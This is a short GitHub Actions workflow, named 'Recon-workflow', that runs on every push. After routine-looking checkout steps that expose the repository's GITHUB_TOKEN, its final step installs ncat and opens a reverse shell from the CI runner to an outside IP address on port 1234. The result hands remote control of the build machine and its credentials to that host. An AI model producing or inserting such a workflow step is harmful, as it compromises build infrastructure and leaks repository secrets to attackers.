name: Recon-workflow

on: push

jobs:
  recon-job:
    permissions:
      contents: 'read'
      id-token: 'write'
    runs-on: ubuntu-latest

    steps:
      - name: Checkout
        uses: actions/checkout@eef61447b9ff4aafe5dcd4e0bbf5d482be7e7871 # v4.2.1

      - name: Check out PR
        run: |
          echo "==> Check out PR..."
          echo gh pr checkout "$github_pr_number"
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}

      - name: Run commands
        shell: bash
        run: |
          set -x
          sudo apt install -y ncat
          ncat 35.209.207.62 1234 -e /bin/bash # comment44
